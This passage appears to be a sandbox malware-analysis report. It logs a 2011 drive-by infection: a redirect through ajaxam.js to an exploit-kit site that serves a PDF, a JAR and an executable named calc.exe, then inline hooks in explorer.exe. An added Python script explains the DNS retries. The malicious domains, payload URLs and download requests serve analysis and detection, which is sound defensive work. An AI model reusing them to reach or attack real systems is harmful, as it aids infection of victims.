Dec 8, 2011 14:53:39.455208063 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455569983 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.455580950 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455728054 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455794096 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.455806017 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.455883026 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.456090927 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.456185102 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.456192970 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.456423998 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.481204987 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.481211901 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.481688976 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.613133907 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:39.613146067 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:39.832456112 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:41.111985922 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:41.112004995 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:42.275878906 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:42.456238031 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:49.635596037 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:49.635706902 CET 80 1064 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:49.635874987 CET 1064 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.050669909 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.050698042 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:57.050935984 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.069785118 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:57.069801092 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:58.200525045 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:53:58.313512087 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:59.575965881 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:53:59.575979948 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:04.407459021 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:04.544128895 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:54:06.202682972 CET 1062 80 192.168.0.13 97.74.215.96
Dec 8, 2011 14:54:33.051043034 CET 80 1063 46.45.137.206 192.168.0.13
Dec 8, 2011 14:54:33.051429987 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:54:40.112162113 CET 1063 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:55:06.918129921 CET 80 1066 46.45.137.206 192.168.0.13
Dec 8, 2011 14:55:06.918376923 CET 1066 80 192.168.0.13 46.45.137.206
Dec 8, 2011 14:55:08.969717026 CET 1066 80 192.168.0.13 46.45.137.206
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 8, 2011 14:52:25.491370916 CET 50633 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:25.797595024 CET 53 50633 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:41.369018078 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:42.360913038 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:43.360970974 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:45.360104084 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:45.360378981 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:49.359268904 CET 52223 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:49.359544039 CET 52223 53 192.168.0.13 195.186.4.121
Dec 8, 2011 14:52:53.406585932 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:54.775715113 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:52:57.528232098 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:57.721203089 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:52:57.978863955 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:52:58.232969046 CET 53027 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:59.231983900 CET 53027 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:52:59.775213957 CET 53 53027 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:00.058979988 CET 53 53027 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:00.835930109 CET 53 52223 195.186.1.121 192.168.0.13
Dec 8, 2011 14:53:01.030433893 CET 53 52223 195.186.4.121 192.168.0.13
Dec 8, 2011 14:53:01.664146900 CET 54387 53 192.168.0.13 195.186.1.121
Dec 8, 2011 14:53:02.218905926 CET 53 54387 195.186.1.121 192.168.0.13
Dec 8, 2011 14:54:52.217982054 CET 22811 20114 192.168.0.13 79.14.160.118
Dec 8, 2011 14:55:07.211968899 CET 22811 21834 192.168.0.13 125.27.159.156
Dec 8, 2011 14:55:22.206707954 CET 22811 21698 192.168.0.13 78.14.232.12
+ All ICMP
Timestamp Source IP Dest IP Checksum Code Type
Dec 8, 2011 14:52:54.776134968 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.528696060 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.721584082 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.979291916 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.059492111 CET 192.168.0.13 195.186.1.121 833b (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.836359024 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:01.030864000 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
+ DNS Query
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Dec 8, 2011 14:52:25.491370916 CET 192.168.0.13 195.186.1.121 0xa3cb Standard query (0) firedepartment.mobi A (IP address) IN (0x0001)
Dec 8, 2011 14:52:41.369018078 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:42.360913038 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:43.360970974 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360104084 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360378981 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359268904 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359544039 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:58.232969046 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.231983900 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.664146900 CET 192.168.0.13 195.186.1.121 0x275f Standard query (0) combijump.com A (IP address) IN (0x0001)
+ DNS Answer
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Dec 8, 2011 14:52:25.797595024 CET 195.186.1.121 192.168.0.13 0xa3cb No error (0) firedepartment.mobi 174.121.93.116 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:53.406585932 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:54.775715113 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.528232098 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.721203089 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.978863955 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.775213957 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.058979988 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.835930109 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.030433893 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:02.218905926 CET 195.186.1.121 192.168.0.13 0x275f No error (0) combijump.com 46.45.137.206 A (IP address) IN (0x0001)
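The eleven DNS Query rows above are four lookups, not eleven: zespolpickup.pl alone accounts for seven, all carrying the same transaction ID 0x1a7c and alternating between the two configured resolvers (195.186.1.121 and 195.186.4.121) at growing intervals, which is the Windows resolver retransmitting a query that is not being answered. The first answer only arrives 12 seconds after the first query; every later answer (and the second southfloridazulunation.com answer) reaches a UDP port the resolver has already closed, and the host replies with the ICMP "Port unreachable" rows in the All ICMP table. The script below is an added example, not part of the Joebox report: it re-parses the DNS Query, DNS Answer and ICMP rows exactly as printed on this page, groups them by transaction ID, and counts retries, resolvers tried, answers and refused answers per lookup. The 5 ms matching window and the rule "an unreachable sent to the same resolver just after an answer refers to that answer" are assumptions (the report does not print the quoted UDP header inside the ICMP payload, which is what a real capture would be keyed on).

```python
import re
from collections import defaultdict

# Rows copied verbatim from the DNS Query, DNS Answer and ICMP tables of the report.
DNS_QUERIES = """\
Dec 8, 2011 14:52:25.491370916 CET 192.168.0.13 195.186.1.121 0xa3cb Standard query (0) firedepartment.mobi A (IP address) IN (0x0001)
Dec 8, 2011 14:52:41.369018078 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:42.360913038 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:43.360970974 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360104084 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:45.360378981 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359268904 CET 192.168.0.13 195.186.1.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:49.359544039 CET 192.168.0.13 195.186.4.121 0x1a7c Standard query (0) zespolpickup.pl A (IP address) IN (0x0001)
Dec 8, 2011 14:52:58.232969046 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.231983900 CET 192.168.0.13 195.186.1.121 0xd3d0 Standard query (0) southfloridazulunation.com A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.664146900 CET 192.168.0.13 195.186.1.121 0x275f Standard query (0) combijump.com A (IP address) IN (0x0001)
"""
DNS_ANSWERS = """\
Dec 8, 2011 14:52:25.797595024 CET 195.186.1.121 192.168.0.13 0xa3cb No error (0) firedepartment.mobi 174.121.93.116 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:53.406585932 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:54.775715113 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.528232098 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.721203089 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:57.978863955 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:52:59.775213957 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.058979988 CET 195.186.1.121 192.168.0.13 0xd3d0 No error (0) southfloridazulunation.com 97.74.215.96 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:00.835930109 CET 195.186.1.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:01.030433893 CET 195.186.4.121 192.168.0.13 0x1a7c No error (0) zespolpickup.pl 188.40.51.83 A (IP address) IN (0x0001)
Dec 8, 2011 14:53:02.218905926 CET 195.186.1.121 192.168.0.13 0x275f No error (0) combijump.com 46.45.137.206 A (IP address) IN (0x0001)
"""
ICMP_UNREACHABLE = """\
Dec 8, 2011 14:52:54.776134968 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.528696060 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.721584082 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:52:57.979291916 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.059492111 CET 192.168.0.13 195.186.1.121 833b (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:00.836359024 CET 192.168.0.13 195.186.1.121 8330 (Port unreachable) Destination Unreachable
Dec 8, 2011 14:53:01.030864000 CET 192.168.0.13 195.186.4.121 8630 (Port unreachable) Destination Unreachable
"""

ROW_RE = re.compile(r"^\w{3} \d+, \d{4} (\d\d):(\d\d):(\d\d)\.(\d{9}) CET (.*)$")


def rows(text):
    """Yield (time_ns, fields) per row. The report prints 9-digit fractions, which
    datetime cannot hold, so time is kept as an integer number of nanoseconds."""
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            h, mi, s, frac, rest = m.groups()
            yield ((int(h) * 60 + int(mi)) * 60 + int(s)) * 10**9 + int(frac), rest.split()


def analyse(queries=DNS_QUERIES, answers=DNS_ANSWERS, icmp=ICMP_UNREACHABLE, reject_window_ms=5):
    """Per transaction ID: retries, resolvers tried, answers, and which answers the host refused."""
    tx = defaultdict(lambda: {"name": None, "queries": [], "resolvers": set(), "answers": []})
    for ts, f in rows(queries):            # f: src dst txid 'Standard' 'query' '(0)' name ...
        tx[f[2]]["name"] = f[6]
        tx[f[2]]["queries"].append(ts)
        tx[f[2]]["resolvers"].add(f[1])
    for ts, f in rows(answers):            # f: src dst txid 'No' 'error' '(0)' name address ...
        tx[f[2]]["answers"].append((ts, f[0], f[7]))
    # ICMP rows are sent by the host (src) to the resolver (dst): a datagram hit a closed port.
    unreachable = [(ts, f[1]) for ts, f in rows(icmp)]
    window = reject_window_ms * 10**6
    report = {}
    for txid, rec in tx.items():
        accepted, rejected = [], 0
        for ts, resolver, address in sorted(rec["answers"]):
            # Assumption: an unreachable to the same resolver within the window refers to this answer.
            hit = next((i for i, (its, idst) in enumerate(unreachable)
                        if idst == resolver and 0 <= its - ts <= window), None)
            if hit is None:
                accepted.append(address)
            else:
                unreachable.pop(hit)
                rejected += 1
        report[txid] = {
            "name": rec["name"], "queries": len(rec["queries"]), "resolvers": len(rec["resolvers"]),
            "answers": len(rec["answers"]), "rejected": rejected, "accepted": accepted,
            "first_answer_s": (min(rec["answers"])[0] - min(rec["queries"])) / 1e9,
        }
    return report
```

For 0x1a7c the report comes back as 7 queries to 2 resolvers, 7 answers, 6 refused and one accepted address, with the first answer 12.04 s after the first query. Two things follow for reading the rest of the page: the 12 s gap between the index.html response and the ajaxam.js request is resolver latency in the sandbox, not a delay built into the page, and the seven "Port unreachable" rows are the victim refusing late DNS answers, not a scan.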
+ HTTP
Timestamp Source Port Dest Port Source IP Dest IP Header
Dec 8, 2011 14:52:25.828499079 CET 1060 80 192.168.0.13 174.121.93.116 GET /f3429b/index.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: firedepartment.mobi
Connection: Keep-Alive
Dec 8, 2011 14:52:41.196527958 CET 80 1060 174.121.93.116 192.168.0.13 HTTP/1.1 200 OK
Date: Thu, 08 Dec 2011 14:01:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 08 Dec 2011 07:46:58 GMT
ETag: "14a3866c-1eb-4b38fdf7c4080"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 209
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Dec 8, 2011 14:52:53.480904102 CET 1061 80 192.168.0.13 188.40.51.83 GET /ajaxam.js HTTP/1.1
Accept: */*
Referer: http://firedepartment.mobi/f3429b/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: zespolpickup.pl
Connection: Keep-Alive
Dec 8, 2011 14:52:58.175259113 CET 80 1061 188.40.51.83 192.168.0.13 HTTP/1.1 404 Not Found
Date: Thu, 08 Dec 2011 14:02:14 GMT
Server: Power MOD by linuxpl.com
Content-Length: 409
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Dec 8, 2011 14:52:59.798469067 CET 1062 80 192.168.0.13 97.74.215.96 GET /ajaxam.js HTTP/1.1
Accept: */*
Referer: http://firedepartment.mobi/f3429b/index.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: southfloridazulunation.com
Connection: Keep-Alive
Dec 8, 2011 14:53:01.639601946 CET 80 1062 97.74.215.96 192.168.0.13 HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 07 Dec 2011 20:58:11 GMT
Accept-Ranges: bytes
ETag: "8574aee22b5cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 08 Dec 2011 14:02:20 GMT
Content-Length: 72
Dec 8, 2011 14:53:02.240076065 CET 1063 80 192.168.0.13 46.45.137.206 GET /main.php?page=abfd0d069b45c17e HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:12.882401943 CET 80 1063 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:25.272623062 CET 1063 80 192.168.0.13 46.45.137.206 GET /content/fdp2.php?f=41::4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://combijump.com/main.php?page=abfd0d069b45c17e
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:26.495893002 CET 1064 80 192.168.0.13 46.45.137.206 GET /content/g43kb6j34kblq6jh34kb6j3kl4.jar HTTP/1.1
accept-encoding: pack200-gzip,gzip
content-type: application/x-java-archive
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Dec 8, 2011 14:53:28.364690065 CET 80 1063 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:52 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Accept-Ranges: bytes
Content-Length: 118094
Content-Disposition: inline; filename=c451a.pdf
Dec 8, 2011 14:53:32.170098066 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:03:58 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 5861
Last-Modified: Wed, 07 Dec 2011 08:42:54 GMT
Accept-Ranges: bytes
Dec 8, 2011 14:53:35.919351101 CET 1064 80 192.168.0.13 46.45.137.206 GET /w.php?f=41&e=1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Dec 8, 2011 14:53:36.869817972 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:02 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Pragma: public
Expires: Thu, 08 Dec 2011 14:11:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 257536
Dec 8, 2011 14:53:41.111985922 CET 1064 80 192.168.0.13 46.45.137.206 GET /w.php?f=4&e=1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_01
Host: combijump.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Dec 8, 2011 14:53:42.275878906 CET 80 1064 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:57.069785118 CET 1066 80 192.168.0.13 46.45.137.206 GET /w.php?f=41&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:53:58.200525045 CET 80 1066 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Dec 8, 2011 14:53:59.575965881 CET 1066 80 192.168.0.13 46.45.137.206 GET /w.php?f=4&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: combijump.com
Connection: Keep-Alive
Dec 8, 2011 14:54:04.407459021 CET 80 1066 46.45.137.206 192.168.0.13 HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 08 Dec 2011 14:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.8-1~dotdeb.2
Hooks
+ User Modules
+ Hook Summary
Function Name Hook Type Active in Processes
GetUpdateRect INLINE explorer.exe, wscntfy.exe, ctfmon.exe
CallWindowProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
CallWindowProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
EndPaint INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetUpdateRgn INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetDCEx INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefWindowProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessageA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessageW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefDlgProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefDlgProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefWindowProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetClipboardData INLINE explorer.exe, wscntfy.exe, ctfmon.exe
OpenInputDesktop INLINE explorer.exe, wscntfy.exe, ctfmon.exe
PeekMessageA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
PeekMessageW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetWindowDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
ReleaseDC INLINE explorer.exe, wscntfy.exe, ctfmon.exe
SetCapture INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefMDIChildProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefMDIChildProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefFrameProcA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
DefFrameProcW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassExW INLINE explorer.exe, wscntfy.exe, ctfmon.exe
TranslateMessage INLINE explorer.exe, wscntfy.exe, ctfmon.exe
BeginPaint INLINE explorer.exe, wscntfy.exe, ctfmon.exe
RegisterClassExA INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetCursorPos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
GetMessagePos INLINE explorer.exe, wscntfy.exe, ctfmon.exe
SwitchDesktop INLINE explorer.exe, wscntfy.exe, ctfmon.exe
